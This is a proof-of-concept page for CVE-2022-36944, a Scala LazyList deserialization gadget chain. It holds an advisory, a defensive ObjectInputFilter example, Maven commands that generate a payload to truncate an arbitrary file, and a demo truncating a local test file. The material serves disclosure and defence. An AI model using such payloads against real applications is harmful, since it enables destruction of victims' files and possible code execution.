
CVE-2022-36944 PoC — Scala code issue vulnerability

Associated Vulnerability

Title: Scala code issue vulnerability (CVE-2022-36944)

Description: Scala 2.13.x before 2.13.9 has a Java deserialization chain in its JAR file. On its own, it cannot be exploited. There is only a risk in conjunction with Java object deserialization within an application. In such situations, it allows attackers to erase contents of arbitrary files, make network connections, or possibly run arbitrary code (specifically, Function0 functions) via a gadget chain.

Description

PoC for the CVE-2022-36944 vulnerability exploit

Readme
# CVE-2022-36944 payload generator
This mini-project is created to demonstrate a proof of concept of the [CVE-2022-36944](https://nvd.nist.gov/vuln/detail/CVE-2022-36944)
vulnerability. It is similar to [ysoserial](https://github.com/frohoff/ysoserial/), but generates a payload only for this CVE, using the
`LazyList` class.

## Quick FAQ
### Which artifacts introduce the vulnerability?
`org.scala-lang:scala-library` with versions `2.13.x` before `2.13.9`
### Which applications are vulnerable?
Both of the following conditions must hold for your application to be exploitable:
- Your application has the vulnerable `scala-library` jar on its classpath
- `ObjectInputStream#readObject()` is eventually called somewhere in your application and untrusted
(attacker-controlled) data is passed to it
### Where was the vulnerability fixed?
See the Scala PR: [#10118](https://github.com/scala/scala/pull/10118)
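Upgrading `scala-library` to 2.13.9 removes the gadget; the second precondition above can be closed independently. As an added example (not code from this repository), the following Java applies a JEP 290 `ObjectInputFilter` allowlist to the stream before `readObject()`, so a serialized `LazyList`, or any other class the endpoint does not expect, is rejected before its deserialization hooks run, and the rejection is logged for detection. The package, the `Order` DTO and the allowlisted JDK type are assumptions.

```java
package com.example.dto; // assumed package

import java.io.*;
import java.util.HashMap;

public final class FilteredReader {
    // Assumed application DTO: the only user type this endpoint should ever read.
    public static final class Order implements Serializable {
        final String sku; final long quantity;
        Order(String sku, long quantity) { this.sku = sku; this.quantity = quantity; }
        @Override public String toString() { return sku + " x" + quantity; }
    }

    // Allowlist filter: the DTO package, java.lang.String and resource limits; the final "!*"
    // rejects every other class (scala.collection.immutable.LazyList included) before
    // ObjectInputStream instantiates it or runs any of its deserialization hooks.
    private static final ObjectInputFilter ALLOWLIST = ObjectInputFilter.Config.createFilter(
        "com.example.dto.*;java.lang.String;maxdepth=8;maxrefs=100;maxbytes=65536;!*");

    // Wrap the allowlist so a REJECTED decision is logged: on untrusted input this is the event
    // a detection pipeline should alert on.
    private static ObjectInputFilter logged(ObjectInputFilter inner) {
        return info -> {
            ObjectInputFilter.Status status = inner.checkInput(info);
            if (status == ObjectInputFilter.Status.REJECTED && info.serialClass() != null) {
                System.err.println("deserialization rejected: " + info.serialClass().getName());
            }
            return status;
        };
    }

    public static Object readUntrusted(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(logged(ALLOWLIST)); // must be set before readObject()
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) { out.writeObject(o); }
        return bytes.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        System.out.println("accepted: " + readUntrusted(serialize(new Order("sku-1", 3))));
        // Constructed stand-in for any class outside the allowlist; a gadget class is rejected the same way.
        try { readUntrusted(serialize(new HashMap<String, String>())); }
        catch (InvalidClassException e) { System.out.println("blocked: " + e.getMessage()); }
    }
}
```

Requires Java 9 or later; the same pattern can be applied process-wide with `ObjectInputFilter.Config.setSerialFilter(...)` or the `jdk.serialFilter` system property to cover `readObject()` calls in code the application does not own.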

## Build
```bash
mvn clean package
```

## Run
The following command dumps the payload to stdout; the payload can be used to truncate an arbitrary file
on the victim's machine:
```bash
mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="/file/to/truncate false"
```

## Demo
### A) Through a file
1. Prepare a test file with some data inside:
```console
$ yes sometestdata > test_data
^C
$ head test_data
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
```
2. Generate the payload and save it to the `payload.ser` file:
```console
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" > payload.ser
```
3. Run the victim process (a ClassCastException is expected):
```console
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="payload.ser"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
```
4. Check that the victim file has been truncated:
```console
$ head test_data
$
```
### B) Pipe to stdin
Steps 2 and 3 can be combined this way (pass "-" as the file argument to Victim):
```console
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" | mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="-"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
```
File Snapshot

```text
[4.0K] /data/pocs/41ac384f59118bbeab8457cbd04a364dda25d327
├── [1.2K] pom.xml
├── [3.8K] README.md
└── [4.0K] src
    ├── [4.0K] main
    │   └── [4.0K] java
    │       └── [4.0K] poc
    │           └── [4.0K] cve
    │               └── [4.0K] lazylist
    │                   ├── [4.0K] function0
    │                   │   └── [2.9K] DefaultProviders.java
    │                   ├── [4.0K] payload
    │                   │   ├── [3.6K] LazyList.java
    │                   │   ├── [ 514] Main.java
    │                   │   └── [ 396] PayloadGenerator.java
    │                   ├── [4.0K] util
    │                   │   ├── [2.4K] ReflectionUtil.java
    │                   │   └── [ 924] SerdeUtil.java
    │                   └── [4.0K] victim
    │                       └── [ 790] Victim.java
    └── [4.0K] test
        └── [4.0K] java
            └── [4.0K] poc
                └── [4.0K] cve
                    └── [4.0K] lazylist
                        ├── [4.0K] function0
                        │   └── [2.7K] DefaultProvidersTest.java
                        └── [4.0K] payload
                            └── [1.6K] LazyListTest.java

17 directories, 11 files
```